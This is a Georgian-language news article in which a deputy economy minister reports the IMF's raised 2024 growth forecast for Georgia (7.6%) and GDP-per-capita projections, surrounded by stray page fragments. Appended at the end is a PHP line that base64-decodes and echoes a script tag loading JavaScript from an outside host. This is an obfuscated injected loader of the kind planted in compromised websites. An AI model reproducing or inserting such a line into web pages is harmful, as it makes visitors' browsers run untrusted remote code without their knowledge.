celsiusi
ავერსი საქკაბელი

 სავალუტო ფონდის მიმოხილვის თანახმად, 2024 წელს საქართველოს ეკონომიკური ზრდის პროგნოზი გაზრდილია და 7.6%-ს შეადგენს, რაც, როგორც ევროპის, ასევე რეგიონის ქვეყნებთან შედარებით ყველაზე მაღალი მაჩვენებელია, - ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილემ, ვახტანგ ცინცაძემ განაცხადა.

მისივე თქმით, მთავრობის ამოცანაა, შეინარჩუნოს ეკონომიკური ზრდის ტემპი უფრო მაღალ ნიშნულზე, ვიდრე ამას საერთაშორისო საფინანსო ინსტიტუტები პროგნოზირებენ და მაქსიმალურად შეამციროს განსხვავება ცხოვრების დონეებს შორის საქართველოსა და ევროკავშირის ქვეყნებს შორის.

„თუ შევადარებთ საქართველოს ეკონომიკურ ზრდას ევროკავშირის წევრობის სხვა კანდიდატი ქვეყნების ეკონომიკური ზრდის საშუალო მაჩვენებლებს, მხოლოდ 2024 წლის მაჩვენებლით, ჩვენი ეკონომიკური ზრდა 2,5-ჯერ აღემატება მათ საშუალო მაჩვენებელს“, - აღნიშნა მინისტრის მოადგილემ.

როგორც ვახტანგ ცინცაძემ განაცხადა, საქართველოს მთავრობა აქტიურად მუშაობს ეკონომიკის ზრდის მიმართულებით და ახორციელებს ინფრასტრუქტურულ პროექტებს, რომელიც ეკონომიკის ტრანსფორმაციას უწყობს ხელს.

„ჩვენ ასევე აქტიურად ვეხმარებით ბიზნესს კონკურენტუნარიანობის გაუმჯობესების მიმართულებით და ყოველი აღნიშნულის შედეგად ჩვენი მოლოდინია, რომ შევძლებთ იმ ეკონომიკური ზრდის შენარჩუნებას, რაც ბოლო სამი წლის განმავლობაში ქვეყანაში ფიქსირდება“, - აღნიშნა მინისტრის მოადგილემ.

ეკონომიკის სამინისტროს ცნობით, საერთაშორისო სავალუტო ფონდმა 2024 წლის ოქტომბრის მსოფლიო ეკონომიკურ მიმოხილვაში მიმდინარე წელს საქართველოს ეკონომიკური ზრდის პროგნოზი 7.6 პროცენტამდე გაზარდა, ხოლო 2025 წელს ზრდის ტემპი 6.0 პროცენტს გაუტოლდება.

სავალუტო ფონდის პროგნოზების შესაბამისად, 2024 წელს საქართველოს მშპ ერთ სულ მოსახლეზე 8,882.6 აშშ. დოლარს - მსყიდველუნარიანობის პარიტეტზე დაყრდნობით - 27,363.4 საერთაშორისო დოლარს გაუტოლდება, ხოლო 2029 წლისთვის მშპ ერთ სულ მოსახლეზე 12,734.2 აშშ. დოლარი - 38,744.7 საერთაშორისო დოლარი იქნება, რაც ევროკავშირის საშუალო მაჩვენებლის 52.5%-ია.

68
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");